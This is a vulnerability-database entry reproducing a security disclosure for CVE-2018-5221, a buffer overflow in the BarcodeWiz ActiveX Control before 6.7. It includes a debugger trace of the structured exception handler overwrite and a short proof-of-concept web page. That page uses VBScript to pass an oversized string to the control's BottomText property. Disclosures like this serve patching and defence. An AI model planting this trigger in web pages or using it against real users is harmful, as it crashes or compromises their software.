Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtHyp3rlinx1337DAY-ID-29381
HistoryJan 07, 2018 - 12:00 a.m.

BarcodeWiz ActiveX Control Buffer Overflow Vulnerability

2018-01-0700:00:00
hyp3rlinx
0day.today
24

0.078 Low

EPSS

Percentile

94.3%

JSON

Exploit for windows platform in category dos / poc

[+] Credits: John Page (aka hyp3rlinx)    

Vendor:
=================
www.barcodewiz.com


Product:
=============
BarcodeWiz ActiveX Control < 6.7

BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes; 
Choose from hundreds of label layouts; Export as PDF or XPS.


Vulnerability Type:
===================
Buffer Overflow


CVE Reference:
==============
CVE-2018-5221


Security Issue:
================
BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite .
This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using
InternetExplorer where the exploit could be triggered.


SEH chain of main thread
Address    SE handler
0018DAC0   kernel32.754E48F3
0018EE34   41414141
41414141   *** CORRUPT ENTRY ***


Exception Code: ACCESS_VIOLATION
Disasm: 2045665  MOV [EDX+ECX],AL  (BarcodeWiz.DLL)

SEH Chain:
--------------------------------------------------
1   41414141   


Called From                   Returns To                    
--------------------------------------------------
BarcodeWiz.2045665            BarcodeWiz.202FF50            
BarcodeWiz.202FF50            41414141                      
41414141                      41414141                      
41414141                      41414141                      
41414141                      41414141                      
41414141                      41414141                      
41414141                      41414141   


Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
IPStorage Safe:  Safe for untrusted: caller,data  


Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>

PAYLOAD=String(12308, "A")

VICTIM.BottomText = PAYLOAD

</script>

#  0day.today [2018-04-04]  #

Related

cve 1
packetstorm 1
prion 1
nvd 1
exploitpack 1
exploitdb 1
cvelist 1
cve
cve
CVE-2018-5221
2018-01-09 16:29:00
packetstorm
packetstorm
BarcodeWiz ActiveX Control Buffer Overflow
2018-01-06 00:00:00
prion
prion
Buffer overflow
2018-01-09 16:29:00
nvd
nvd
CVE-2018-5221
2018-01-09 16:29:00
exploitpack
exploitpack
BarcodeWiz ActiveX Control 6.7 - Buffer Overflow (PoC)
2018-01-08 00:00:00
exploitdb
exploitdb
BarcodeWiz ActiveX Control &lt; 6.7 - Buffer Overflow (PoC)
2018-01-08 00:00:00
cvelist
cvelist
CVE-2018-5221
2018-01-09 16:00:00

0.078 Low

EPSS

Percentile

94.3%

JSON
Related for 1337DAY-ID-29381
cve1packetstorm1prion1nvd1exploitpack1exploitdb1cvelist1